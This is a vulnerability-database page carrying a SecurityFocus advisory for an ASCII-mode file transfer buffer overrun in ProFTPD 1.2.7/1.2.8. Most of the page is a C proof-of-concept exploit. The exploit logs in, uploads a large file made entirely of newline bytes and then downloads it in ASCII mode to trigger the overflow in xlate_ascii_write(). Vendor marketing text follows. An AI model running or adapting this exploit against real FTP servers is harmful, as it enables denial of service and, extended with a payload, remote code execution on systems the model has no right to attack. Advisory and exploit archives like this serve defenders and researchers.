Vulners
Lucene search
ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability
source: http://www.securityfocus.com/bid/8679/info
A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server.
It is also reported that ProFTPD does not adequately drop privileges in some circumstances, which may compound the risks associated with exploitation.
This issue could also affect versions prior to 1.2.7, though this has not been confirmed.
/*
* -- ProFTPd [1.2.7-1.2.8] proof-of-concept --
*
* This code is quite ugly, don't have time cleaning it;
*
* description: iss gave a lil hint to me, so i found the vuln
* in src/data.c file, xlate_ascii_write() function
* when the iss advisory came out.
*
* -netris at ok.kz
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int s1,s2;
struct sockaddr_in a1,a2;
char *senddata(int sock,char *data, int resp);
void data_connect(char *addr,char *pasv, int bool);
int data_port(char *pret, char *addr);
int main(int argc, char *argv[])
{
char *ret;
char buf[100];
if(argc!=4){
fprintf(stderr,"usage: %s login pass ip_addr\n",argv[0]);
exit(0);
}
a1.sin_family = AF_INET;
a1.sin_port = htons(21);
a1.sin_addr.s_addr = inet_addr(argv[3]);
s1 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(s1,(struct sockaddr*)&a1,sizeof(a1));
senddata(s1,0,1);
sprintf(buf,"USER %s\n",argv[1]);
senddata(s1,buf,2);
sprintf(buf,"PASS %s\n",argv[2]);
senddata(s1,buf,2);
senddata(s1,"TYPE A\n",2);
ret = senddata(s1,"PASV\n",2); /*STOR*/
data_connect(argv[3],ret,0);
ret = senddata(s1,"PASV\n",2); /*RETR*/
data_connect(argv[3],ret,1);
ret = senddata(s1,"PASV\n",2); /*RETR (needed sometimes)*/
data_connect(argv[3],ret,1);
close(s1);
close(s2);
return 0;
}
char *senddata(int sock,char *data, int resp)
{
char buf[66000];
int i;
if(resp>=2){
send(sock,data,strlen(data),0);
if(strlen(data)<512)
printf("%s\n",data);
}
if(resp<=2){
i=recv(sock,buf,sizeof(buf),0);
buf[i]=0;
if(strlen(buf)<512)
printf("%s",buf);
}
return buf;
}
int data_port(char *pasv, char *addr)
{
int i=0,j,p1,p2,h1=1;
p1=p2=0;
for(j=0;j<4;j++)
for(i+=1;pasv[i]!=',';i++);
for(i+=1;pasv[i]!=',';i++)
p1=p1*10+pasv[i]-'0';
for(i+=1;pasv[i]!=')';i++)
p2=p2*10+pasv[i]-'0';
h1 += inet_addr(addr) & 0x000000ff;
j = p1*h1*2+p2;
printf("Data port: %d\n",j);
return j;
}
void data_connect(char *addr, char *pasv, int bool)
{
int port,i;
static char buf[65559];
close(s2);
port = data_port(pasv,addr);
a2.sin_port = htons(port);
a2.sin_family = AF_INET;
a2.sin_addr.s_addr = inet_addr(addr);
s2 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(s2,(struct sockaddr*)&a2,sizeof(a2));
if(!bool){
senddata(s1,"STOR kf\n",2);
for(i=0;i<65558;i++)buf[i]=0x0a;
buf[i]=0;
senddata(s2,buf,3);
close(s2);
}
else{
senddata(s1,"RETR kf\n",2);
senddata(s2,"\n",2);
}
senddata(s1,"\n",2);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1